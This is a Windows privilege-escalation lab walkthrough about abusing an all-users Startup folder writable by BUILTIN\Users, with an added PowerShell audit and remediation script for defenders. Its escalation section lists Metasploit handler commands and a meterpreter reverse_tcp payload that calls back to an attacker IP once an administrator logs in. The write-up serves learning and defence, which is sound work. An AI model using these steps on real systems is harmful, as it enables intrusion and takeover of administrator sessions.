✨Startup Applications
Startup applications in Windows are programs or scripts that automatically initiate when a user logs into the system. In the context of privilege escalation (privesc), attackers often leverage the execution of malicious code during system startup to elevate their privileges.
Overview
We are going to use a tool called icacls.exe.

Purpose: icacls.exe is a command-line utility that lets users display and modify permissions on objects in the file system.
Usage: Used for viewing or modifying ACLs, which define the permissions users and groups have on a particular file or directory.
Access Control List (ACL): A list associated with an object (e.g., file, directory) that specifies the permissions granted or denied to users or groups.
Access Control Lists (ACLs) are a fundamental concept in computer security, particularly in operating systems like Windows. ACLs define permissions and access rights to resources such as files, folders, or registry keys.
We are going to run this command:

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

icacls.exe: This is the executable for the command-line tool that deals with ACLs.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup": This is the path to the Startup folder where programs are launched automatically when a user logs in.
The BUILTIN\Users group is a default Windows security group that includes all user accounts created on the system. When Full Control permissions (F) are granted to this group, members of the Users group have complete access to and control over the specified resource, such as a file, directory, or service. Because everything in this folder runs at each interactive logon, Full Control for Users means any standard user can place a file there that will execute with the privileges of whoever logs in next, including an administrator.
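As an added example, not from the original write-up, here is a PowerShell check a defender can run to find the same weakness icacls reveals: it flags any broad group that can write into the all-users Startup folder and lists what is currently sitting there. It assumes the stock path and the English well-known group names.

```powershell
# Added example (not from the original page): audit the all-users Startup folder
# for ACEs that let low-privileged groups drop files into it, and list its contents.
# Assumes a stock Windows install with English well-known group names.
$startup = 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup'

# Groups that should never hold write rights on an all-users autostart location.
$broadGroups = @('BUILTIN\Users', 'Everyone',
                 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Any overlap with these rights lets a member create or replace a file in the folder
# (this is what the icacls (F), (M) and (W) flags, or a CreateFiles special right, grant).
$writeRights = [System.Security.AccessControl.FileSystemRights]'CreateFiles, Write, Modify, FullControl'

$acl = Get-Acl -LiteralPath $startup
$findings = foreach ($ace in $acl.Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    if ($broadGroups -notcontains $ace.IdentityReference.Value) { continue }
    # -band on the raw integer also catches generic rights not named in the enum.
    if (([int]$ace.FileSystemRights -band [int]$writeRights) -eq 0) { continue }
    [pscustomobject]@{
        Identity  = $ace.IdentityReference.Value
        Rights    = $ace.FileSystemRights
        Inherited = $ace.IsInherited
    }
}

if ($findings) {
    Write-Warning "Broad write access on $startup"
    $findings | Format-Table -AutoSize
} else {
    Write-Host "OK: no broad group can write to $startup"
}

# Everything here runs at every interactive logon, an administrator's included.
# A file owned by a non-admin account in this folder deserves a closer look.
Get-ChildItem -LiteralPath $startup -Force |
    Where-Object { $_.Name -ne 'desktop.ini' } |
    Select-Object Name, Length, LastWriteTime,
        @{ n = 'Owner'; e = { (Get-Acl -LiteralPath $_.FullName).Owner } }

# Remediation from an elevated prompt: remove the offending grant, e.g.
#   icacls "$startup" /remove:g "BUILTIN\Users"
# then re-run this script or icacls "$startup" to confirm only admins and SYSTEM can write.
```

Run it as the low-privileged user first: if the warning appears, that user could have planted the payload described in the next section.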
Escalation
To gain elevated privileges, go to your Kali machine, load msfconsole and use the multi/handler:
Open command prompt and type: msfconsole
In Metasploit (msf > prompt) type: use multi/handler
In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) type: run
Now, in another terminal, generate the payload with these options:

-p windows/meterpreter/reverse_tcp: Specifies the payload as a reverse TCP Meterpreter shell for Windows.
LHOST=10.10.141.112: Sets the local host IP address to 10.10.141.112. This is the IP address where the reverse shell will connect back.
-f exe: Specifies the output format as an executable (exe) file.
-o y.exe: Defines the output file as "y.exe".
I then started a simple local Python server and went to the Windows machine to download my file into the Startup folder located at:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Now we are going to simulate an admin login to our machine with the payload placed in the startup programs.
Disconnect from the session and launch your msfconsole:
Then connect to the box with the TCM account.
We connect over rdesktop with admin credentials, the startup payload executes, and our Meterpreter session returns a shell.